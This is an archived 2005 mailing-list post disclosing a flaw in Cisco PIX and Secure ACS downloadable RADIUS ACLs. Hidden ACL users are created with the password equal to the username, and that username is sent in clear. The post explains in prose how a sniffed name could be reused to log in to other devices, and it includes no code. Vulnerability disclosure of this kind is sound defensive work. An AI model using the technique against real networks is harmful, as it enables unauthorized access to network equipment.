Cisco PIX / CS ACS: Downloadable RADIUS ACLs vulnerability
- From: ovt@xxxxxxxxxxxx
- Date: 22 Dec 2005 23:42:10 -0800
Hi!
The following is the description of the vulnerability in the Cisco
implementation of downloadable ACLs, which are used by the Cisco PIX
firewall authentication proxy (aka cut-through proxy) and VPN 3000
concentrators.
When an administrator creates an ACL on the Cisco Secure Access Control
Server (CS ACS Radius server) it is assigned the internal name
#ACSACL#-IP-uacl-<random>. For example, the name may be the following:
#ACSACL#-IP-uacl-43a97a9d. The <random> is changed by CS ACS every time
the ACL is modified by the administrator. At the same time the internal
hidden user with the name #ACSACL#-IP-uacl-43a97a9d and the password
#ACSACL#-IP-uacl-43a97a9d (!) is created by CS ACS. This user is not
seen in the CS ACS GUI.
The protocol used by the PIX to download the ACL works as follows: 0)
User goes to Internet (for example) thru the PIX via HTTP(s). PIX asks
a username and a password. User enters them into the dialog window. 1)
PIX sends Radius Access-Request to CS ACS to authenticate the user (the
user password is encrypted by Radius). 2) Radius server authenticates
the user and sends back the cisco-av-pair Vendor-specific attribute
(VSA) with the value
ACS:CiscoSecure-Defined-ACL=#ACSACL#-IP-uacl-43a97a9d. 3) PIX again
sends Radius Access-Request to authenticate the user
#ACSACL#-IP-uacl-43a97a9d. 4) Radius server authenticates the user and
sends back the ACL body as another cisco-av-pair VSA attribute
(ip:inacl#1= ...).
Vulnerability:
This basically means that everybody with a sniffer can see the username
#ACSACL#-IP-uacl-43a97a9d which is sent over the network in clear by
the Radius protocol from the CS ACS server to the PIX. The password of
this user is the same as the username. If some network device is
configured to use the very same CS ACS server for login authentication
then the sniffed username can be used to login to this network device.
Setting Radius IETF attribute Service-type to "Outbound" to prevent
using this username for logins may not help: 1) it's impossible to set
this attribute for the user #ACSACL#-IP-uacl-43a97a9d, because the user
is not seen in the CS ACS Web interface 2) it's not always possible to
set it for the "default" group (the user #ACSACL#-IP-uacl-43a97a9d
always belongs to the "default" CS ACS group), because this group may
be used for something else 3) some network devices (most notably the
PIX firewall) ignore the Service-Type attribute (PIX firewall 6.x code
does not support login authorization at all (!)). Cisco routers ignore
this attribute if authorization is not configured (only authentication
is configured).
Generally speaking the Radius protocol is not appropriate for doing
such things as downloading ACLs or other attributes on behalf of the
user on an "as-needed" basis, as it doesn't separate the authentication
and authorization. Usually this leads to creation of a fake user with
the password "cisco" or "<username>". Unfortunately this practice is
common on Cisco devices.
Thx,
Oleg Tipisov,
Moscow
.
- Follow-Ups:
- Re: Cisco PIX / CS ACS: Downloadable RADIUS ACLs vulnerability
- From: Walter Roberson
- Re: Cisco PIX / CS ACS: Downloadable RADIUS ACLs vulnerability
- Prev by Date: Re: router to router latency question
- Next by Date: Re: Which Switch? 6500--4500--3750
- Previous by thread: UDP Packets dropping
- Next by thread: Re: Cisco PIX / CS ACS: Downloadable RADIUS ACLs vulnerability
- Index(es):
Relevant Pages
|
